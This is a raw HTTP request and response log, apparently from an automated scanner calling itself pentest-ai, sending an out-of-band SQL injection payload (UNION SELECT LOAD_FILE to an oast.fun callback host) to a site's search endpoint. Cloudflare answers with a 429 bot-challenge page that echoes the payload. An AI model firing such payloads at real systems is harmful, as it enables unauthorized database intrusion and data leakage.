REQUEST:
GET https://my.myfirst.tech/search?username=%27%20UNION%20SELECT%20LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%27%2C%27%5C%5Ca%27%29%29--%20-
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:19 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9784
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8475d3cd6a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=tDo9myKzq6IltfCialm4BxxdIlDVU3U3bh8NWjiAHhxfiMj4BiCcLzZgu7wy9GqYGJIebb0GQoWHXmArSnwGfXGrClAY69jlRUiFoLlapGILFN7TRkeDpP3LVZveOLo%2FqErvoV90471MWIlHww%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8475d3cd6a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'sH6MJcnM7vwpRkPzE_0eEt.AUmjPwN02txA3WDZcrtk-1784281159-1.2.1.1-dlC75ks.xGIg..TrzUzB0uD9NeD9WbLNrClAaXwi5Bq7o0viiD9NfqZxvfgEey9n',cITimeS: '1784281159',cRay: 'a1c8475d3cd6a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?username=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_tk=YhpmFfQctSz5TU3jmCUMYO.JBBdzWpMochwlepOYp30-1784281159-1.0.1.1-TakQO9_ounpEvtRi9Js1tvWCQgwG0dLGZIRJfEvEvY4",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?username=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_f_tk=YhpmFfQctSz5TU3jmCUMYO.JBBdzWpMochwlepOYp30-1784281159-1.0.1.1-TakQO9_ounpEvtRi9Js1tvWCQgwG0dLGZIRJfEvEvY4",md: 'LuJ4xWOMKqilGnOXXKdxil_hRVrUvYvX24_YcuYlFNw-1784281159-1.2.1.1-vgRDjkeyqLR2YCcpK2oh2KwEKOg8n71c8g5bKQfmz3pGPrf.CUHE5f_XYCBM.ulDbLH2_Uhk65aMlo_n5PHoutrUrnF9tKqgklga5D0zfEoGXXvcTFUl24guDx3fI9vxaSrNkwra72SDO69XVwf0ZrqKZh2R9I2ASBiFNLafZQ_v9xKXSD8awOxEJN01a2M7CGcxBAQDlqmMU0FD7IXmujTfZm3bFeIYYSQzijC_.J9s3LpQvZZ2OKozJAfbrasNJZUPqF82GwP69FYky5O6OUMCTqgu6qKiIoUJbWUsbKQkoLLoAPfDpP3jR5j_Anc5ly1GeIdgbGNEgR4EuB_d0nnTt0KGTmeic4EmiPn_mu5GfME1CA.qZuJQaFLRiXt_tSfkuH7olY1eB0HRYok4v49BQnGfGLFrVfpYqRQ11.dfGMkDdq7YJAKEcpog8Fms6oERWMiwTGuZwBEK4jhjTebSeGaHD5ahIuU.eg3fSBsl.yvpQ_WLLe6pYMwEI3QayNDFAe6emaSOjsV7JiNxsiPglTCTuS9AbclTakq8KaJWpcZhVLffj8ctAaPTZGEQK13PUaFDIu9axshFF4omjln_W.nlEHjAKM6UGsJTye_g.kdBUHuVaKru3WUZ90QSm7ROstU5rn6Rxzuv1Ngbh4qmIhJJlCepaaJ8XwE.rOv.LgUcqbQkmvrNONfdWBxZj9UijvknasyJbJZewdD.QBdn1cFyvcBMIuu0KmihdJnLRGMh5wtQ4nBhAnD99STbPEocy0R7zV.ySlm8mZ_3I1VngJeRdcRyU09PfHGSZlbtjnfpd2A6ycTY7TZ.DebXREjk2YHfwElXDGabA4YrC6LpWxPkxEKD6lA4Ct_CuwVP4Ebgrio1iHY2GfdOXTTIC6ENu0glOQHlWuoh2vp6P30UphFC5ces.XwfrN_fg.VgBbeJ_rPLUr1eM3DUsTQqea4k1x0a1dUvSsFy9HrZKV4Q1kgGPMjY9BBAkI6yRnXBarpalMVsa9bLCMKVPH0_ujvTlnvYTLBEjZI3xMUD9glJ6gzB_pyFVLR.MuYxF2lgSEPmli..4CkpV8oofMgFTQLbtWQQXrxu8YI2l05Y2B.DRdtiTrW0m8_LRi6OIYSz2h5zK16xBOccMlN4uUryE2e5A06nHoZB1uTaQCxAfsfK600pRenIBRvPI_YWQZ_mblHfqSLUKkC.XXeBzWLWLQQaHF81T6qMYY.oF_BocY.ngeDYPgjEBSsZWU3Ao6I3Jn2fRZMh8QqbV6ck5f6ZWBP4kFNXBlpvzansOIpst_dPxKmlh8XN5h5.2M4o9wI',mdrd: 'kR3o.JFHI8Q_eO.PVVUYOL2tvpyPylC8apKJCVZIvZ0-1784281159-1.2.1.1-JqSm5RSIAnjyNB6Ik0e04rpc4sUk_AwwyFXHI44nDepgqxI98bhYVv._zCtm0QCSzoYzAP4nrPTn4VsrlawApJbkO68vOe.h.vfjmQYNR0jZy5308SfDbQlIelw24iS7LAYUnurPuj18O9d_cZMnmUPlu.YznDO3OUIfAztgw0D7gh7JpgvD6NEAnA0Z5cb1zh7v.l.IUiXQUBjFZFITa_hELRU4mAqOfcGkskWtC1ysrqY8lEo4nNLxyTsaMBx9',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8475d3cd6a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?username=%27+UNION+SELECT+LOAD_FILE%28CONCAT%28%27%5C%5C%5C%5C%27%2C%27h0cqg45t8jh21623dc0zto0stc8yb1pxl.oast.fun%27%2C%27%5C%5Ca%27%29%29--+-\u0026__cf_chl_rt_tk=YhpmFfQctSz5TU3jmCUMYO.JBBdzWpMochwlepOYp30-1784281159-1.0.1.1-TakQO9_ounpEvtRi9Js1tvWCQgwG0dLGZIRJfEvEvY4"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
